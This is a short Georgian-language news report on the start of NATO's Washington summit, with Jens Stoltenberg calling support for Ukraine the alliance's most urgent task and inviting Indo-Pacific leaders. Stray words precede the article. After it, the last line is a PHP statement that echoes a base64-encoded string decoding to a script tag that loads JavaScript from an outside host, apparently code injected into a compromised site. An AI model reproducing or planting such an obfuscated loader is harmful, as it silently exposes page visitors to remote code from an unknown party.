celsiusi
ავერსი საქკაბელი

ვაშინგტონში დღეს ნატო-ს სამდღიანი სამიტი იწყება. ალიანსის გენერალურმა მდივანმა, იენს სტოლტენბერგმა, სამიტზე საუბრისას განაცხადა, რომ უკრაინის მხარდაჭერა ნატო-ს ყველაზე გადაუდებელი ამოცანა იქნება.

„ვიმედოვნებ, რომ სახელმწიფოებისა და მთავრობების მეთაურები უკრაინისთვის არსებით პაკეტზე შეთანხმდებიან“, - აღნიშნა სტოლტენბერგმა.

მისი თქმით, მოკავშირეები შეთანხმდებიან უკრაინის ფინანსურ დაპირებაზე და ის ასევე ელის უკრაინისთვის უფრო მყისიერ სამხედრო დახმარებას, უსაფრთხოების საკითხზე მეტ ორმხრივ შეთანხმებებს და მუშაობას გაღრმავებულ სამხედრო თავსებადობაზე. ალიანსის გენერალურმა მდივანმა ხაზი გაუსვა, რომ ყველა ეს ელემენტი „ქმნის ხიდს ნატო-ში გაწევრიანებისკენ და უკრაინისთვის ძალიან ძლიერ პაკეტს სამიტზე“. „უკრაინა უახლოვდება ნატო-ს“, - დასძინა სტოლტენბერგმა.

მისი თქმით, სამიტის თემები ასევე იქნება შეკავება და თავდაცვა და გლობალური პარტნიორობა.

გენერალურმა მდივანმა სამიტზე მიიწვია ავსტრალიის, იაპონიის, ახალი ზელანდიისა და კორეის რესპუბლიკის ლიდერები თანამშრომლობის შემდგომი გაღრმავების მიზნით, მათ შორის უკრაინის, კიბერ და ახალი ტექნოლოგიების მხარდაჭერაზე.

”რაც უფრო მჭიდროდ უკავშირდებიან ერთმანეთს ავტორიტარული აქტორები, მით უფრო მნიშვნელოვანია, რომ მჭიდროდ ვითანამშრომლოთ ჩვენს მეგობრებთან ინდო-წყნარი ოკეანის რეგიონში,” - აღნიშნა სტოლტენბერგმა.

119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");